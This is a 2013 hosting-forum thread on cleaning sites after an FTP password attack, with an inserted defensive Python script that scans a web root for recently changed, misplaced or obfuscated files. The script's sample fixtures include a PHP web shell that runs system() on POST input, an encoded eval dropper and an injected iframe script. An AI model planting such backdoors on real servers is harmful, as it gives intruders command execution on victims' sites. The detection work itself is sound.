  1. #1
    Junior Member
    Join Date
    Jan 2010
    Posts
    17

    Malicious code on server

    I just got the email about sites being compromised and passwords having been changed, and they list things to do to secure your site. One thing they list is to check all files for malicious code, but doesn't Westhost do that on their servers, or should I as a website owner? If I have to do this, how do we do it? They never really say, and it would be nice of them to give a little more info than simply "Review and clean your files".

  2. #2
    Member
    Join Date
    Aug 2008
    Location
    Odessa
    Posts
    30


    Quote Originally Posted by jeffopus View Post
    I just got the email about sites being compromised and passwords having been changed, and they list things to do to secure your site. One thing they list is to check all files for malicious code, but doesn't Westhost do that on their servers, or should I as a website owner? If I have to do this, how do we do it? They never really say, and it would be nice of them to give a little more info than simply "Review and clean your files".
    I agree. A more elaborate explanation would help. I have learned that if you have a virus on your site, it shows up as JavaScript written into your HTML files. Those files are the ones on the server, not your clean ones at home on your computer. I know how to use Notepad++ to search through files on my computer for a sample of text, but I don't know how to do it online. I also wouldn't know what text or symbols to search for. Maybe there's software that does it, like the kind we use for our computers.

  3. #3
    Moderator wildjokerdesign
    Join Date
    Jun 2003
    Location
    Kansas City Mo
    Posts
    5,721


    Well, the notice did mention that those accounts that had actually been compromised would be contacted with further information. I think maybe it is always a bit of a situation of not wanting to reveal too much for fear that you may be enabling the "bad guy". I am not sure that in this case that is true though. OK, so I had two accounts that were compromised. The first I was able to catch before they were actually able to complete the attack. Here is what I encountered and how I handled it. I must preface this though that my skills are a bit more advanced than many website owners'. I understand HTML, PHP, JavaScript and other programming languages. It may be easier to simply have Westhost deal with this for you.

    First step before anything else. Get the password changed for the account in question. At this point it may mean you need to contact Westhost direct and verify you are the account owner.

    I use a free program called WinSCP to SFTP into my account and manage files. This allows me to easily view files on the remote servers. I can see the modified dates of each file, so it is easy to spot new files that are uploaded to the server or have been modified. This is how I was able to find malicious code that had been uploaded. In this case it was two files, but unfortunately they were randomly named. I am very aware of the files on my accounts, so I spotted them as not being part of my site and removed them. Like I said, on one account that was as far as the hackers had gotten and they had not used the files to write the JavaScript to my other files. On the other site they had gotten to my files. I did attempt to clean them manually by opening up and editing the files on the server (I use EditPlus in combination with WinSCP to view the contents of server files), but it was so widespread and in so many files that I gave up and simply used a clean backup copy of the files and replaced the ones on the server.

    So there you have it. Not even sure I did it justice. You can kind of see why WestHost may not have given more detailed instructions.
    Shawn
    Please remember your charity of choice: http://www.redcross.org

    Handy Links: wildjokerdesign.net | Plain Text Editors: EditPlus | Crimson
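The triage Shawn describes above (spot files by modified date, find the randomly named PHP files that were dropped outside the site's own code, recognise the one that is encoded), written out as an added example. This is not WestHost tooling and not the poster's own script: it is a Python script that walks a web root. The asset directory list, the two regexes for "encoded" PHP and appended script tags, and the sample web root (built in a temporary directory so the script runs offline) are all illustrative assumptions, not signatures taken from the thread.

```python
"""Triage a web root for what the post above describes: files changed since
a cutoff, PHP files dropped into asset directories (js/, css/, images/),
and PHP whose body is obfuscated. Added example: not WestHost tooling and
not the poster's own script. ASSET_DIRS, the regexes and the sample web
root are assumptions made for illustration."""
import os
import re
import tempfile
import time
from datetime import datetime

# Directories that should never hold server-side code (assumption; adjust
# for your CMS).
ASSET_DIRS = {"js", "css", "images", "img", "fonts"}

# Generic shape of an "encoded" PHP dropper: eval() over a decoder call.
# Illustrative, not a signature from the thread.
OBFUSCATED_PHP = re.compile(
    rb"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(",
    re.IGNORECASE,
)
# Script appended after the real end of an HTML document, or the
# document.write(unescape(...)) / hidden-iframe idioms. Also an assumption.
INJECTED_JS = re.compile(
    rb"</html>\s*<script|document\.write\s*\(\s*unescape\s*\(|<iframe[^>]*visibility\s*:\s*hidden",
    re.IGNORECASE,
)


def _rel(path, root):
    """Path relative to root, always '/'-separated."""
    return os.path.relpath(path, root).replace(os.sep, "/")


def recently_modified(root, since):
    """Relative paths of files whose mtime is later than datetime `since`."""
    cutoff = since.timestamp()
    return sorted(
        _rel(os.path.join(d, f), root)
        for d, _, files in os.walk(root)
        for f in files
        if os.path.getmtime(os.path.join(d, f)) > cutoff
    )


def misplaced_php(root):
    """PHP files that live under an asset directory at any depth."""
    hits = []
    for d, _, files in os.walk(root):
        if set(_rel(d, root).split("/")) & ASSET_DIRS:
            hits += [_rel(os.path.join(d, f), root) for f in files
                     if f.lower().endswith(".php")]
    return sorted(hits)


def suspicious_content(root):
    """{relpath: reason} for PHP matching OBFUSCATED_PHP and HTML/JS matching
    INJECTED_JS. A cleartext backdoor is *not* caught here; that is what
    misplaced_php() and a comparison against a clean backup are for."""
    hits = {}
    for d, _, files in os.walk(root):
        for f in files:
            ext = f.lower().rsplit(".", 1)[-1]
            if ext not in ("php", "js", "html", "htm"):
                continue
            path = os.path.join(d, f)
            with open(path, "rb") as fh:
                data = fh.read()
            if ext == "php" and OBFUSCATED_PHP.search(data):
                hits[_rel(path, root)] = "obfuscated php"
            elif ext != "php" and INJECTED_JS.search(data):
                hits[_rel(path, root)] = "injected script"
    return hits


def build_sample_root():
    """Constructed web root (not real site data): a small Joomla-like layout
    dated 30 days back, plus two planted PHP files and an index.html that
    stands for an existing page overwritten with a script appended, all with
    fresh mtimes. Returns (root, cutoff datetime of 24 hours ago)."""
    root = tempfile.mkdtemp(prefix="webroot-")
    now = time.time()
    clean = {
        "index.php": b"<?php define('_JEXEC', 1); require 'includes/framework.php';",
        "css/template.css": b"body { margin: 0; }",
        "js/site.js": b"function init() { return true; }",
        "images/logo.png": b"\x89PNG\r\n\x1a\n",
    }
    planted = {
        "js/x7q2k.php": b"<?php eval(base64_decode('cGhwaW5mbygpOw==')); ?>",   # "encoded"
        "css/a9f3.php": b"<?php if (isset($_POST['c'])) system($_POST['c']); ?>",  # cleartext
        "index.html": (b"<html><body>Welcome</body></html>\n"
                       b"<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//example.invalid/%22%3E'))</script>"),
    }
    entries = [(r, b, now - 30 * 86400) for r, b in clean.items()]
    entries += [(r, b, now) for r, b in planted.items()]
    for rel, body, mtime in entries:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)
        os.utime(path, (mtime, mtime))
    return root, datetime.fromtimestamp(now - 86400)


if __name__ == "__main__":
    root, since = build_sample_root()
    print("modified since", since, "->", recently_modified(root, since))
    print("php in asset dirs ->", misplaced_php(root))
    for rel, why in suspicious_content(root).items():
        print(f"{why}: {rel}")
```

Note that the cleartext file in css/ is found only by where it sits, not by what it contains, which is why the placement check and the modified-date check are run alongside the content patterns. Modified dates are a good first pass, but whoever holds the FTP password can set them to anything; the other two checks do not depend on them.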

  4. #4

    I just had a client contact me about this

    I just got an email from a client about this. So much for installing the kitchen cabinets today :)

    I'm not sure exactly what is going on with this. Was it everyone on a server?

    The site in question is running on Joomla 1.5. I'll talk to him about upgrading to 2.5.x. That won't be that big of a deal as it is a small site.

    Anyway, I'm going to go in and see if I can change the password for the account. Then I'll set up Joomla 2.5.14 and migrate it.

    It would be nice to have some more info as to exactly what happened so I don't chase wild geese.

    BTW, I figured this was legit when I called and they said "Your number in the queue is fifteen" <muffled laughter in the background>.

  5. #5
    Moderator wildjokerdesign
    Join Date
    Jun 2003
    Location
    Kansas City Mo
    Posts
    5,721


    Upgrading I think should take care of things for them. That should overwrite any files that would have gotten corrupted.

    While you are in there look for two .php files that do not look like part of the Joomla program. Check in js or css directories. One of the php files is in clear readable text and the other is encoded. Get rid of them!

    You more than likely will have to contact WH though to get them to reset the password before you can even get into the account in question.
    Shawn

  6. #6
    Moderator wildjokerdesign
    Join Date
    Jun 2003
    Location
    Kansas City Mo
    Posts
    5,721


    I forgot to mention this in this thread.

    You need to make sure that Google is not listing you as an infected site. Both of mine were, and I had to use https://www.google.com/webmasters/tools to get it sorted out. If you don't already use the tools then you are going to have to first set things up and add any domains you need monitored/rescanned. You are going to upload a file that Google supplies to your public root in order to verify you are the owner, so make sure you have access before you begin. Not to mention you need to make sure all is clean before you have them re-scan.

    Why is this important? If Google has you listed as an infected site then browsers that check that list (Chrome and FF do, I know) will block the site. All your Google search links will also be redirected to a page at Google warning of the infection.
    Shawn

  7. #7
    Junior Member
    Join Date
    Jan 2010
    Posts
    17


    The main thing I want to know is what they are doing to prevent this, and what we can do after an infection to clean things up as well as prevent this. They say to change passwords, which is a pain when you have emails and site databases, but it is not too much of a pain. But how do we clean things up and prevent it in the future? They don't tell us anything about that other than to keep things updated, which is a given in my opinion. How about a site or program that checks for and removes malicious code from our sites?

    I understand it is not exactly their job to prevent malicious files on our sites, but some clue as to what to do and where to go would be helpful. Please have a post added to the forum about helpful advice, sites to look for help, or something.

    My son has already said to check out the W3C Validator to look for infections and malware, as well as SiteLock, which I will be checking out, but WestHost doesn't even say anything about stuff like this. I had no clue someone could do this kind of stuff until it happened to me, and then WestHost says to clean up my site but nothing as to how to do this.

    Please give us some kind of idea about what we can do and where we can get information about this instead of just telling us to clean our site and files.
    Last edited by jeffopus; 09-08-2013 at 02:21 PM.

  8. #8
    Moderator wildjokerdesign
    Join Date
    Jun 2003
    Location
    Kansas City Mo
    Posts
    5,721


    Jeff,

    It was a dictionary attack on FTP accounts. Something very hard to prevent. Changing passwords can help, but I agree it can be a big pain. I am pretty sure there is a program in place that can scan for malicious content, but due to the nature of the ever-changing attacks it is really hard to write programming that actually cleans it up. Using a backup of the site from before the infection occurred is really the only automatic process that could be employed, but that also has its disadvantages. Let's say you have a site where you let your users upload images. Any images that were uploaded after the backup would be lost. This could really upset some people if WestHost did an automatic restore of data. From what I am hearing on the forums here, it was not an attack on a particular CMS, which makes things even more complicated.

    In this case the hackers scanned for JavaScript files in your public root and then added their malicious code to them. On a CMS this can be a lot of files. I think maybe it even looked for HTML files that looked like they may be index files and tried adding it to them. As far as I was able to figure out it did not touch the database, which was a good thing. So I actually used a clean copy of the software files to replace the ones on the server, but I know how my CMS software works and is organized.

    Get to know the programs you use on your site. WordPress, Joomla and most other CMSs have good documentation. Many even have information on what you can do if your site gets hacked. Armed with that information you can better maintain your site. Some actually have add-ons that can help scan for stuff like this, but beware: they can also often cripple a normal site and make it unusable by your users. They may be able to see your site but any editing, upload or posting to the site may be blocked. In this case such an add-on would not have helped you.

    There are services you can pay for out there that will keep track of your site and look for problems (Google Webmaster Tools does this but is free) but as a rule they detect an issue after it has happened and can simply notify you of the problem. Good place to start and at least you know something is wrong.

    I am not aware of any software that would be affordable that could really protect your site completely. If they claim they can I would be skeptical of them.
    Shawn

  9. #9
    Moderator wildjokerdesign
    Join Date
    Jun 2003
    Location
    Kansas City Mo
    Posts
    5,721


    Something else. If you have a copy of the clean install of wordpress on your local computer then you can actually use it to compare with the files on the server. In fact some FTP programs have a feature built into them that will compare the files for you. That would be one way to check for changed and infected files or even new files that have been uploaded that may be suspect. May help in tracking things down.
    Shawn

  10. #10
    Senior Member
    Join Date
    Sep 2003
    Posts
    206


    I too had an attack on an account which resulted in almost all files having JavaScript injection. The tech support mentioned a cPanel hack as a possibility. I really don't know much about this, so I searched around for some info. Is it possible that the cPanel server was hacked, given the scope of the attack, instead of a dictionary attack on each site? Possibly something similar to the following:

    http://arstechnica.com/security/2013...ediate-action/

    Fortunately I discovered the problem a couple hours after the event. And tech support was very helpful with a restore. Although I do have some new login issues that I need to work through.

    A couple questions:

    What was the JavaScript that I saw? What was the goal of the attack?

    Are sites that scan for site malware effective such as: http://sitecheck.sucuri.net/scanner/

    Any other tools that are better than the one above?

    The email mentions the need to change every password, MySQL and email.... just a precaution or is there another vulnerability that was exposed?

    thanks,

    j
    Last edited by J_M; 09-08-2013 at 08:22 PM.
